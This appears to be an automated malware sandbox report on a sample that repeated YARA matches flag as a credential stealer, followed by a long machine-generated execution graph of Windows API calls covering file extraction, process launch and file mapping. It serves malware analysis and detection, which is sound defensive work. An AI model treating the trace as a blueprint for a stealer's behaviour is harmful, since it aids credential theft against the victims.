                                                                                                                                      MD5 hash:B0D5568D499D1DFA75064E85E9FB3EAC
                                                                                                                                      Has elevated privileges:false
                                                                                                                                      Has administrator privileges:false
                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                      Yara matches:
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.1982904201.0000000000F67000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.2008902691.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.1983969551.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.2033433013.0000000000F59000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.1983497240.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.2058427523.0000000000F59000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.2063694200.0000000000F69000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.2033655753.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.2064442018.0000000000F6F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.1982875210.0000000000F58000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.2034685044.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.1984430461.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000003.2058810259.0000000000F5A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                      Reputation:low
                                                                                                                                      Has exited:true

                                                                                                                                      Disassembly

                                                                                                                                      Reset < >

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:10.4%
                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                        Signature Coverage:9.8%
                                                                                                                                        Total number of Nodes:1489
                                                                                                                                        Total number of Limit Nodes:26
                                                                                                                                        execution_graph 23906 7ad779 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 21921 7ab077 21923 7ab07c 21921->21923 21935 7aaa99 _wcsrchr 21921->21935 21923->21935 21947 7ab9aa 21923->21947 21925 7ab642 21927 7aad86 SetWindowTextW 21927->21935 21932 7aab77 SetFileAttributesW 21934 7aac32 GetFileAttributesW 21932->21934 21943 7aab6a ___scrt_get_show_window_mode 21932->21943 21936 7aac40 DeleteFileW 21934->21936 21934->21943 21935->21925 21935->21927 21938 7aaf50 GetDlgItem SetWindowTextW SendMessageW 21935->21938 21941 7aaf92 SendMessageW 21935->21941 21935->21943 21946 7a0b12 CompareStringW 21935->21946 21970 7a96ec 21935->21970 21974 7a8b8e GetCurrentDirectoryW 21935->21974 21975 79a1a9 7 API calls 21935->21975 21981 79a132 FindClose 21935->21981 21982 7a9844 69 API calls new 21935->21982 21983 7b20de 21935->21983 21936->21943 21938->21935 21941->21935 21943->21932 21943->21934 21943->21935 21976 79b100 52 API calls 2 library calls 21943->21976 21977 793f5b 21943->21977 21980 79a1a9 7 API calls 21943->21980 21944 7aac86 MoveFileW 21944->21943 21945 7aac9e MoveFileExW 21944->21945 21945->21943 21946->21935 21948 7ab9b4 ___scrt_get_show_window_mode 21947->21948 21949 7aba9f 21948->21949 21955 7abc0c 21948->21955 21999 7a0b12 CompareStringW 21948->21999 21996 799dff 21949->21996 21953 7abad3 ShellExecuteExW 21953->21955 21959 7abae6 21953->21959 21955->21935 21956 7abacb 21956->21953 21957 7abb21 22001 7abe69 WaitForSingleObject PeekMessageW WaitForSingleObject 21957->22001 21958 7abb77 CloseHandle 21960 7abb90 21958->21960 21961 7abb85 21958->21961 21959->21957 21959->21958 21963 7abb1b ShowWindow 21959->21963 21960->21955 21966 7abc07 ShowWindow 21960->21966 22002 7a0b12 CompareStringW 21961->22002 21963->21957 21965 7abb39 21965->21958 21967 7abb4c GetExitCodeProcess 21965->21967 21966->21955 21967->21958 21968 7abb5f 21967->21968 21968->21958 21972 7a96f6 21970->21972 21971 7a97cc 21971->21935 21972->21971 21973 7a97a9 ExpandEnvironmentStringsW 21972->21973 21973->21971 21974->21935 21975->21935 21976->21943 22026 793f2e 21977->22026 21980->21943 21981->21935 21982->21935 21984 7b5aea 21983->21984 21985 7b5b02 21984->21985 21986 7b5af7 21984->21986 21987 7b5b0a 21985->21987 21995 7b5b13 _abort 21985->21995 22113 7b59fc 21986->22113 21989 7b59c2 _free 20 API calls 21987->21989 21992 7b5aff 21989->21992 21990 7b5b18 22120 7b5e3e 20 API calls _abort 21990->22120 21991 7b5b3d HeapReAlloc 21991->21992 21991->21995 21992->21935 21995->21990 21995->21991 22121 7b46ca 7 API calls 2 library calls 21995->22121 22003 799e13 21996->22003 21999->21949 22000 79ae20 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW CharUpperW 22000->21956 22001->21965 22002->21960 22011 7acec0 22003->22011 22006 799e08 22006->21953 22006->22000 22007 799e31 22013 79b275 22007->22013 22009 799e45 22009->22006 22010 799e49 GetFileAttributesW 22009->22010 22010->22006 22012 799e20 GetFileAttributesW 22011->22012 22012->22006 22012->22007 22014 79b282 22013->22014 22015 79b28c 22014->22015 22023 79b40f CharUpperW 22014->22023 22015->22009 22017 79b29b 22024 79b43b CharUpperW 22017->22024 22019 79b2aa 22020 79b2ae 22019->22020 22021 79b325 GetCurrentDirectoryW 22019->22021 22025 79b40f CharUpperW 22020->22025 22021->22015 22023->22017 22024->22019 22025->22015 22027 793f45 ___scrt_initialize_default_local_stdio_options 22026->22027 22030 7b34dd 22027->22030 22033 7b21bb 22030->22033 22034 7b21fb 22033->22034 22035 7b21e3 22033->22035 22034->22035 22036 7b2203 22034->22036 22050 7b5e3e 20 API calls _abort 22035->22050 22052 7b2636 22036->22052 22039 7b21e8 22051 7b5d1d 26 API calls _abort 22039->22051 22044 793f4f GetFileAttributesW 22044->21943 22044->21944 22045 7b228b 22061 7b283c 51 API calls 3 library calls 22045->22061 22048 7b2296 22062 7b26b9 20 API calls _free 22048->22062 22049 7b21f3 22063 7ad783 22049->22063 22050->22039 22051->22049 22053 7b2653 22052->22053 22054 7b2213 22052->22054 22053->22054 22070 7b631f GetLastError 22053->22070 22060 7b2601 20 API calls 2 library calls 22054->22060 22056 7b2674 22090 7b646e 38 API calls __fassign 22056->22090 22058 7b268d 22091 7b649b 38 API calls __fassign 22058->22091 22060->22045 22061->22048 22062->22049 22064 7ad78e IsProcessorFeaturePresent 22063->22064 22065 7ad78c 22063->22065 22067 7addb8 22064->22067 22065->22044 22112 7add7c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 22067->22112 22069 7ade9b 22069->22044 22071 7b633b 22070->22071 22072 7b6335 22070->22072 22076 7b638a SetLastError 22071->22076 22093 7b5a8d 22071->22093 22092 7b78f8 11 API calls 2 library calls 22072->22092 22076->22056 22077 7b6355 22100 7b59c2 22077->22100 22080 7b636a 22080->22077 22082 7b6371 22080->22082 22081 7b635b 22084 7b6396 SetLastError 22081->22084 22107 7b6191 20 API calls _abort 22082->22107 22108 7b5a4a 38 API calls _abort 22084->22108 22085 7b637c 22087 7b59c2 _free 20 API calls 22085->22087 22089 7b6383 22087->22089 22089->22076 22089->22084 22090->22058 22091->22054 22092->22071 22098 7b5a9a _abort 22093->22098 22094 7b5ac5 RtlAllocateHeap 22097 7b5ad8 22094->22097 22094->22098 22095 7b5ada 22110 7b5e3e 20 API calls _abort 22095->22110 22097->22077 22106 7b794e 11 API calls 2 library calls 22097->22106 22098->22094 22098->22095 22109 7b46ca 7 API calls 2 library calls 22098->22109 22101 7b59f6 __dosmaperr 22100->22101 22102 7b59cd RtlFreeHeap 22100->22102 22101->22081 22102->22101 22103 7b59e2 22102->22103 22111 7b5e3e 20 API calls _abort 22103->22111 22105 7b59e8 GetLastError 22105->22101 22106->22080 22107->22085 22109->22098 22110->22097 22111->22105 22112->22069 22114 7b5a3a 22113->22114 22118 7b5a0a _abort 22113->22118 22123 7b5e3e 20 API calls _abort 22114->22123 22115 7b5a25 RtlAllocateHeap 22117 7b5a38 22115->22117 22115->22118 22117->21992 22118->22114 22118->22115 22122 7b46ca 7 API calls 2 library calls 22118->22122 22120->21992 22121->21995 22122->22118 22123->22117 23907 7bd774 IsProcessorFeaturePresent 23851 7a8963 GdipDisposeImage GdipFree pre_c_initialization 23908 7b1f60 RtlUnwind 23807 791067 75 API calls pre_c_initialization 23909 7b7ede 27 API calls _ValidateLocalCookies 23853 7a995f 104 API calls 23854 7a955f 71 API calls 22189 7acd5c 22190 7acd66 22189->22190 22193 7acabc 22190->22193 22221 7ac7ca 22193->22221 22195 7acad6 22196 7acb33 22195->22196 22197 7acb57 22195->22197 22232 7aca3a 11 API calls 3 library calls 22196->22232 22201 7acbcf LoadLibraryExA 22197->22201 22204 7acc30 22197->22204 22208 7accfe 22197->22208 22213 7acc42 22197->22213 22199 7acb3e RaiseException 22216 7acd2c 22199->22216 22200 7ad783 _ValidateLocalCookies 5 API calls 22202 7acd3b 22200->22202 22203 7acbe2 GetLastError 22201->22203 22201->22204 22205 7acc0b 22203->22205 22206 7acbf5 22203->22206 22209 7acc3b FreeLibrary 22204->22209 22204->22213 22233 7aca3a 11 API calls 3 library calls 22205->22233 22206->22204 22206->22205 22207 7acca0 GetProcAddress 22207->22208 22211 7accb0 GetLastError 22207->22211 22235 7aca3a 11 API calls 3 library calls 22208->22235 22209->22213 22215 7accc3 22211->22215 22213->22207 22213->22208 22214 7acc16 RaiseException 22214->22216 22215->22208 22234 7aca3a 11 API calls 3 library calls 22215->22234 22216->22200 22218 7acce4 RaiseException 22219 7ac7ca ___delayLoadHelper2@8 11 API calls 22218->22219 22220 7accfb 22219->22220 22220->22208 22222 7ac7fc 22221->22222 22223 7ac7d6 22221->22223 22222->22195 22236 7ac878 8 API calls 2 library calls 22223->22236 22225 7ac7db 22226 7ac7f7 22225->22226 22237 7ac9ca VirtualQuery GetSystemInfo VirtualProtect DloadObtainSection DloadMakePermanentImageCommit 22225->22237 22238 7ac7fd GetModuleHandleW GetProcAddress GetProcAddress 22226->22238 22229 7ad783 _ValidateLocalCookies 5 API calls 22230 7acab8 22229->22230 22230->22195 22231 7aca87 22231->22229 22232->22199 22233->22214 22234->22218 22235->22216 22236->22225 22237->22226 22238->22231 23809 79605e 73 API calls 23855 7ad553 46 API calls 5 library calls 23910 7ad74a 28 API calls 2 library calls 22932 7a9b4f 22933 7a9b59 __EH_prolog 22932->22933 23092 7912e7 22933->23092 22936 7a9b9b 22940 7a9ba8 22936->22940 22941 7a9c11 22936->22941 23001 7a9b87 22936->23001 22937 7aa230 23165 7ab8bc 22937->23165 22945 7a9bad 22940->22945 22946 7a9be4 22940->22946 22944 7a9cb0 GetDlgItemTextW 22941->22944 22950 7a9c2b 22941->22950 22942 7aa24e SendMessageW 22943 7aa25c 22942->22943 22948 7aa276 GetDlgItem SendMessageW 22943->22948 22949 7aa265 SendDlgItemMessageW 22943->22949 22944->22946 22947 7a9ce7 22944->22947 22956 79d142 54 API calls 22945->22956 22945->23001 22951 7a9c05 KiUserCallbackDispatcher 22946->22951 22946->23001 22953 7a9cff GetDlgItem 22947->22953 22954 7a9cf0 22947->22954 23183 7a8b8e GetCurrentDirectoryW 22948->23183 22949->22948 22955 79d142 54 API calls 22950->22955 22951->23001 22959 7a9d39 SetFocus 22953->22959 22960 7a9d13 SendMessageW SendMessageW 22953->22960 22954->22946 22968 7aa1d0 22954->22968 22961 7a9c4d SetDlgItemTextW 22955->22961 22957 7a9bc7 22956->22957 23205 791227 SHGetMalloc 22957->23205 22958 7aa2a8 GetDlgItem 22963 7aa2c1 22958->22963 22964 7aa2c7 SetWindowTextW 22958->22964 22966 7a9d49 22959->22966 22976 7a9d55 22959->22976 22960->22959 22965 7a9c5b 22961->22965 22963->22964 23184 7a8fc8 GetClassNameW 22964->23184 22974 7a9c68 GetMessageW 22965->22974 22984 7a9c8e TranslateMessage DispatchMessageW 22965->22984 22965->23001 22970 79d142 54 API calls 22966->22970 22967 7a9bce 22972 7a9bd2 SetDlgItemTextW 22967->22972 22967->23001 22973 79d142 54 API calls 22968->22973 22971 7a9d53 22970->22971 23102 7ab70e GetDlgItem 22971->23102 22972->23001 22977 7aa1e0 SetDlgItemTextW 22973->22977 22974->22965 22974->23001 22982 79d142 54 API calls 22976->22982 22980 7aa1f4 22977->22980 22987 79d142 54 API calls 22980->22987 22986 7a9d87 22982->22986 22983 7a9daa 23110 799cce 22983->23110 22984->22965 22985 7aa312 22990 7aa342 22985->22990 22994 79d142 54 API calls 22985->22994 22991 793f5b _swprintf 51 API calls 22986->22991 22992 7aa21d 22987->22992 22989 7aaa45 91 API calls 22989->22985 23000 7aaa45 91 API calls 22990->23000 23030 7aa3fa 22990->23030 22991->22971 22995 79d142 54 API calls 22992->22995 22999 7aa325 SetDlgItemTextW 22994->22999 22995->23001 22996 7aa4aa 23002 7aa4bc 22996->23002 23003 7aa4b3 EnableWindow 22996->23003 22997 7a9ddf GetLastError 22998 7a9de6 22997->22998 23116 7a9023 SetCurrentDirectoryW 22998->23116 23005 79d142 54 API calls 22999->23005 23006 7aa35d 23000->23006 23007 7aa4d9 23002->23007 23214 7912a4 GetDlgItem EnableWindow 23002->23214 23003->23002 23009 7aa339 SetDlgItemTextW 23005->23009 23010 7aa36f 23006->23010 23031 7aa394 23006->23031 23015 7aa500 23007->23015 23023 7aa4f8 SendMessageW 23007->23023 23008 7a9dfc 23013 7a9e0f 23008->23013 23014 7a9e05 GetLastError 23008->23014 23009->22990 23212 7a859c 6 API calls 23010->23212 23012 7aa3ed 23018 7aaa45 91 API calls 23012->23018 23022 7a9e8a 23013->23022 23025 7a9e9a 23013->23025 23027 7a9e27 GetTickCount 23013->23027 23014->23013 23015->23001 23019 79d142 54 API calls 23015->23019 23017 7aa4cf 23215 7912a4 GetDlgItem EnableWindow 23017->23215 23018->23030 23024 7aa519 SetDlgItemTextW 23019->23024 23020 7aa388 23020->23031 23022->23025 23026 7aa0d3 23022->23026 23023->23015 23024->23001 23033 7aa06e 23025->23033 23034 7a9eb2 GetModuleFileNameW 23025->23034 23125 7912c2 GetDlgItem ShowWindow 23026->23125 23035 793f5b _swprintf 51 API calls 23027->23035 23028 7aa488 23213 7a859c 6 API calls 23028->23213 23030->22996 23030->23028 23037 79d142 54 API calls 23030->23037 23031->23012 23038 7aaa45 91 API calls 23031->23038 23033->22946 23042 79d142 54 API calls 23033->23042 23206 79de7c 73 API calls 23034->23206 23041 7a9e44 23035->23041 23036 7aa4a7 23036->22996 23037->23030 23043 7aa3c2 23038->23043 23039 7aa0e3 23126 7912c2 GetDlgItem ShowWindow 23039->23126 23117 7994f1 23041->23117 23046 7aa082 23042->23046 23043->23012 23047 7aa3cb DialogBoxParamW 23043->23047 23045 7a9edc 23049 793f5b _swprintf 51 API calls 23045->23049 23051 793f5b _swprintf 51 API calls 23046->23051 23047->22946 23047->23012 23048 7aa0ed 23053 79d142 54 API calls 23048->23053 23050 7a9efe CreateFileMappingW 23049->23050 23055 7a9f60 GetCommandLineW 23050->23055 23087 7a9fdd __vswprintf_c_l 23050->23087 23056 7aa0a0 23051->23056 23054 7aa0f7 SetDlgItemTextW 23053->23054 23127 7912c2 GetDlgItem ShowWindow 23054->23127 23060 7a9f71 23055->23060 23069 79d142 54 API calls 23056->23069 23057 7a9e6a 23061 7a9e78 23057->23061 23062 7a9e71 GetLastError 23057->23062 23058 7a9fe8 ShellExecuteExW 23082 7aa005 23058->23082 23207 7a97e4 SHGetMalloc 23060->23207 23065 799437 72 API calls 23061->23065 23062->23061 23063 7aa10b SetDlgItemTextW GetDlgItem 23066 7aa13c 23063->23066 23067 7aa124 GetWindowLongW SetWindowLongW 23063->23067 23065->23022 23128 7aaa45 23066->23128 23067->23066 23068 7a9f8d 23208 7a97e4 SHGetMalloc 23068->23208 23069->22946 23073 7a9f99 23209 7a97e4 SHGetMalloc 23073->23209 23074 7aa048 23074->23033 23081 7aa05e UnmapViewOfFile CloseHandle 23074->23081 23075 7aaa45 91 API calls 23077 7aa158 23075->23077 23153 7abc78 23077->23153 23078 7a9fa5 23210 79dfde 73 API calls ___scrt_get_show_window_mode 23078->23210 23081->23033 23082->23074 23085 7aa034 Sleep 23082->23085 23084 7a9fbc MapViewOfFile 23084->23087 23085->23074 23085->23082 23087->23058 23093 791349 23092->23093 23094 7912f0 23092->23094 23234 79ceb0 GetWindowLongW SetWindowLongW 23093->23234 23095 791356 23094->23095 23216 79ced7 23094->23216 23095->22936 23095->22937 23095->23001 23099 791325 GetDlgItem 23099->23095 23100 791335 23099->23100 23100->23095 23101 79133b SetWindowTextW 23100->23101 23101->23095 23103 7ab76a SendMessageW SendMessageW 23102->23103 23104 7ab73a 23102->23104 23105 7ab7a2 23103->23105 23106 7ab7c1 SendMessageW SendMessageW SendMessageW 23103->23106 23107 7ab745 ShowWindow SendMessageW SendMessageW 23104->23107 23105->23106 23108 7ab80b SendMessageW 23106->23108 23109 7ab7ec SendMessageW 23106->23109 23107->23103 23108->22983 23109->23108 23112 799cd8 23110->23112 23111 799d69 23113 799e86 9 API calls 23111->23113 23114 799d92 23111->23114 23112->23111 23112->23114 23238 799e86 23112->23238 23113->23114 23114->22997 23114->22998 23116->23008 23118 7994fb 23117->23118 23119 799565 CreateFileW 23118->23119 23120 799559 23118->23120 23119->23120 23121 7995b7 23120->23121 23122 79b275 2 API calls 23120->23122 23121->23057 23123 79959e 23122->23123 23123->23121 23124 7995a2 CreateFileW 23123->23124 23124->23121 23125->23039 23126->23048 23127->23063 23129 7aaa4f __EH_prolog 23128->23129 23130 7aa14a 23129->23130 23131 7a96ec ExpandEnvironmentStringsW 23129->23131 23130->23075 23142 7aaa86 _wcsrchr 23131->23142 23133 7a96ec ExpandEnvironmentStringsW 23133->23142 23134 7aad86 SetWindowTextW 23134->23142 23137 7b20de 22 API calls 23137->23142 23139 7aab77 SetFileAttributesW 23141 7aac32 GetFileAttributesW 23139->23141 23150 7aab6a ___scrt_get_show_window_mode 23139->23150 23143 7aac40 DeleteFileW 23141->23143 23141->23150 23142->23130 23142->23133 23142->23134 23142->23137 23145 7aaf50 GetDlgItem SetWindowTextW SendMessageW 23142->23145 23148 7aaf92 SendMessageW 23142->23148 23142->23150 23259 7a0b12 CompareStringW 23142->23259 23260 7a8b8e GetCurrentDirectoryW 23142->23260 23261 79a1a9 7 API calls 23142->23261 23264 79a132 FindClose 23142->23264 23265 7a9844 69 API calls new 23142->23265 23143->23150 23145->23142 23147 793f5b _swprintf 51 API calls 23149 7aac75 GetFileAttributesW 23147->23149 23148->23142 23149->23150 23151 7aac86 MoveFileW 23149->23151 23150->23139 23150->23141 23150->23142 23150->23147 23262 79b100 52 API calls 2 library calls 23150->23262 23263 79a1a9 7 API calls 23150->23263 23151->23150 23152 7aac9e MoveFileExW 23151->23152 23152->23150 23154 7abc82 __EH_prolog 23153->23154 23266 79f165 69 API calls 23154->23266 23156 7abcb3 23267 795bb7 69 API calls 23156->23267 23158 7abcd1 23268 797b10 74 API calls 2 library calls 23158->23268 23160 7abd15 23269 797c84 23160->23269 23162 7abd24 23278 797ba0 23162->23278 23166 7ab8c9 23165->23166 23167 7a8ac0 6 API calls 23166->23167 23168 7ab8ce 23167->23168 23169 7ab8d6 GetWindow 23168->23169 23170 7aa236 23168->23170 23169->23170 23173 7ab8f2 23169->23173 23170->22942 23170->22943 23171 7ab8ff GetClassNameW 23779 7a0b12 CompareStringW 23171->23779 23173->23170 23173->23171 23174 7ab988 GetWindow 23173->23174 23175 7ab927 GetWindowLongW 23173->23175 23174->23170 23174->23173 23175->23174 23176 7ab937 SendMessageW 23175->23176 23176->23174 23177 7ab94d GetObjectW 23176->23177 23780 7a8b22 GetDC GetDeviceCaps ReleaseDC 23177->23780 23180 7ab962 23781 7a8adf GetDC GetDeviceCaps ReleaseDC 23180->23781 23782 7a8cf3 8 API calls ___scrt_get_show_window_mode 23180->23782 23182 7ab972 SendMessageW DeleteObject 23182->23174 23183->22958 23185 7a8fe9 23184->23185 23186 7a900e 23184->23186 23783 7a0b12 CompareStringW 23185->23783 23188 7a901c 23186->23188 23189 7a9013 SHAutoComplete 23186->23189 23192 7a9485 23188->23192 23189->23188 23190 7a8ffc 23190->23186 23191 7a9000 FindWindowExW 23190->23191 23191->23186 23193 7a948f __EH_prolog 23192->23193 23194 79137e 75 API calls 23193->23194 23195 7a94b1 23194->23195 23784 791edd 23195->23784 23198 7a94da 23201 7918f6 127 API calls 23198->23201 23199 7a94cb 23200 79162e 79 API calls 23199->23200 23202 7a94d6 23200->23202 23203 7a94fc __vswprintf_c_l new 23201->23203 23202->22985 23202->22989 23204 79162e 79 API calls 23203->23204 23204->23202 23205->22967 23206->23045 23207->23068 23208->23073 23209->23078 23210->23084 23212->23020 23213->23036 23214->23017 23215->23007 23235 79c88e 23216->23235 23218 79cefd GetWindowRect GetClientRect 23219 79cff2 23218->23219 23225 79cf57 23218->23225 23220 79d034 GetSystemMetrics GetWindow 23219->23220 23221 79cffc GetWindowTextW 23219->23221 23227 79d054 23220->23227 23222 79c91f 52 API calls 23221->23222 23223 79d028 SetWindowTextW 23222->23223 23223->23220 23224 79cfb8 GetWindowLongW 23229 79cfe2 GetWindowRect 23224->23229 23225->23220 23225->23224 23226 791312 23226->23095 23226->23099 23227->23226 23228 79d060 GetWindowTextW 23227->23228 23230 79c91f 52 API calls 23227->23230 23231 79d11b GetWindow 23227->23231 23232 79d0a6 GetWindowRect 23227->23232 23228->23227 23229->23219 23233 79d093 SetWindowTextW 23230->23233 23231->23226 23231->23227 23232->23231 23233->23227 23234->23095 23236 79c91f 52 API calls 23235->23236 23237 79c8b6 _wcschr 23236->23237 23237->23218 23239 799e93 23238->23239 23240 799eb7 23239->23240 23242 799eaa CreateDirectoryW 23239->23242 23241 799dff 4 API calls 23240->23241 23243 799ebd 23241->23243 23242->23240 23244 799eea 23242->23244 23245 799efd GetLastError 23243->23245 23246 79b275 2 API calls 23243->23246 23248 799ef9 23244->23248 23251 79a0c3 23244->23251 23245->23248 23249 799ed3 23246->23249 23248->23112 23249->23245 23250 799ed7 CreateDirectoryW 23249->23250 23250->23244 23250->23245 23252 7acec0 23251->23252 23253 79a0d0 SetFileAttributesW 23252->23253 23254 79a113 23253->23254 23255 79a0e6 23253->23255 23254->23248 23256 79b275 2 API calls 23255->23256 23257 79a0fa 23256->23257 23257->23254 23258 79a0fe SetFileAttributesW 23257->23258 23258->23254 23259->23142 23260->23142 23261->23142 23262->23150 23263->23150 23264->23142 23265->23142 23266->23156 23267->23158 23268->23160 23270 797c8e 23269->23270 23275 797cf8 23270->23275 23304 79a145 23270->23304 23272 797da4 23272->23162 23274 797d62 23274->23272 23310 796d0d 67 API calls 23274->23310 23275->23274 23276 79a145 8 API calls 23275->23276 23282 79820b 23275->23282 23276->23275 23279 797bae 23278->23279 23281 797bb5 23278->23281 23280 7a0e21 79 API calls 23279->23280 23280->23281 23283 798215 __EH_prolog 23282->23283 23311 79137e 23283->23311 23285 798230 23319 799ba2 23285->23319 23291 79825f 23439 79162e 23291->23439 23292 7982fa 23338 7983a3 23292->23338 23295 79835a 23342 791e8e 23295->23342 23299 79825b 23299->23291 23299->23292 23302 79a145 8 API calls 23299->23302 23443 79b6cb CompareStringW 23299->23443 23300 798365 23300->23291 23346 793a20 23300->23346 23356 798409 23300->23356 23302->23299 23305 79a15a 23304->23305 23309 79a15e 23305->23309 23767 79a273 23305->23767 23307 79a16e 23308 79a173 FindClose 23307->23308 23307->23309 23308->23309 23309->23270 23310->23272 23312 791383 __EH_prolog 23311->23312 23445 79c413 23312->23445 23314 7913ba 23318 791413 ___scrt_get_show_window_mode 23314->23318 23451 7acdae 23314->23451 23317 79ac66 75 API calls 23317->23318 23318->23285 23320 799bad 23319->23320 23321 798246 23320->23321 23460 796e66 67 API calls 23320->23460 23321->23291 23323 7919b1 23321->23323 23324 7919bb __EH_prolog 23323->23324 23331 7919fd 23324->23331 23337 7919e4 23324->23337 23461 79135c 23324->23461 23326 791b16 23464 796d0d 67 API calls 23326->23464 23328 793a20 90 API calls 23333 791b6d 23328->23333 23329 791b26 23329->23328 23329->23337 23330 791bb7 23336 791bea 23330->23336 23330->23337 23465 796d0d 67 API calls 23330->23465 23331->23326 23331->23329 23331->23337 23333->23330 23334 793a20 90 API calls 23333->23334 23334->23333 23335 793a20 90 API calls 23335->23336 23336->23335 23336->23337 23337->23299 23339 7983b0 23338->23339 23483 79ffb8 GetSystemTime SystemTimeToFileTime 23339->23483 23341 798314 23341->23295 23444 7a06c8 65 API calls 23341->23444 23343 791e93 __EH_prolog 23342->23343 23344 791ec7 23343->23344 23485 7918f6 23343->23485 23344->23300 23347 793a2c 23346->23347 23348 793a30 23346->23348 23347->23300 23349 793a5d 23348->23349 23350 793a4f 23348->23350 23703 79276c 90 API calls 3 library calls 23349->23703 23352 793a8f 23350->23352 23702 793203 78 API calls 3 library calls 23350->23702 23352->23300 23354 793a5b 23354->23352 23704 791fd2 67 API calls 23354->23704 23357 798413 __EH_prolog 23356->23357 23358 79844f 23357->23358 23387 798453 23357->23387 23733 7a77e7 93 API calls 23357->23733 23359 798478 23358->23359 23362 7984ff 23358->23362 23358->23387 23361 79849a 23359->23361 23359->23387 23734 797a2f 151 API calls 23359->23734 23361->23387 23735 7a77e7 93 API calls 23361->23735 23362->23387 23705 795d98 23362->23705 23366 79858c 23366->23387 23713 7980f8 23366->23713 23368 7986e9 23370 79a145 8 API calls 23368->23370 23371 79874d 23368->23371 23370->23371 23717 797c11 23371->23717 23373 79c57d 73 API calls 23377 7987a7 _memcmp 23373->23377 23374 7988d1 23375 7989a0 23374->23375 23382 79891f 23374->23382 23380 7989fb 23375->23380 23392 7989ab 23375->23392 23376 7988ca 23738 796d0d 67 API calls 23376->23738 23377->23373 23377->23374 23377->23376 23377->23387 23736 7980a6 75 API calls 23377->23736 23737 796d0d 67 API calls 23377->23737 23390 79898f 23380->23390 23741 797f88 89 API calls 23380->23741 23381 7989f9 23383 799437 72 API calls 23381->23383 23384 799dff 4 API calls 23382->23384 23382->23390 23383->23387 23388 798956 23384->23388 23385 799437 72 API calls 23385->23387 23387->23300 23388->23390 23739 799161 89 API calls 23388->23739 23389 798a64 23391 79971a GetFileType 23389->23391 23402 798acd 23389->23402 23435 798fb5 23389->23435 23390->23381 23390->23389 23394 798aa5 23391->23394 23392->23381 23740 797dc4 93 API calls pre_c_initialization 23392->23740 23393 79a6a9 8 API calls 23396 798b1c 23393->23396 23394->23402 23742 791f18 67 API calls 23394->23742 23398 79a6a9 8 API calls 23396->23398 23404 798b32 23398->23404 23400 798abb 23743 796f67 68 API calls 23400->23743 23402->23393 23403 798bd5 23405 798c1e 23403->23405 23406 798d22 23403->23406 23404->23403 23723 799869 23404->23723 23407 798c8e 23405->23407 23408 798c2e 23405->23408 23410 798d48 23406->23410 23411 798d34 23406->23411 23418 798c4e 23406->23418 23409 7980f8 CharUpperW 23407->23409 23414 798c72 23408->23414 23421 798c3c 23408->23421 23415 798ca9 23409->23415 23413 7a1fa9 68 API calls 23410->23413 23416 7990d0 120 API calls 23411->23416 23417 798d61 23413->23417 23414->23418 23745 7977d4 101 API calls 23414->23745 23415->23418 23423 798cd9 23415->23423 23424 798cd2 23415->23424 23416->23418 23419 7a1c40 120 API calls 23417->23419 23427 798e6c 23418->23427 23748 791f18 67 API calls 23418->23748 23419->23418 23744 791f18 67 API calls 23421->23744 23747 79900e 85 API calls __EH_prolog 23423->23747 23746 797586 77 API calls pre_c_initialization 23424->23746 23428 798edb 23427->23428 23427->23435 23749 799b6a SetEndOfFile 23427->23749 23728 799a12 23428->23728 23432 798f35 23433 7994a3 68 API calls 23432->23433 23434 798f40 23433->23434 23434->23435 23436 79a0c3 4 API calls 23434->23436 23435->23385 23437 798f9f 23436->23437 23437->23435 23750 791f18 67 API calls 23437->23750 23440 791640 23439->23440 23766 79c4b6 79 API calls 23440->23766 23443->23299 23444->23295 23446 79c41d __EH_prolog 23445->23446 23447 7acdae new 8 API calls 23446->23447 23448 79c460 23447->23448 23449 7acdae new 8 API calls 23448->23449 23450 79c484 23449->23450 23450->23314 23453 7acdb3 new 23451->23453 23452 791400 23452->23317 23452->23318 23453->23452 23457 7b46ca 7 API calls 2 library calls 23453->23457 23458 7ad83a RaiseException CallUnexpected new 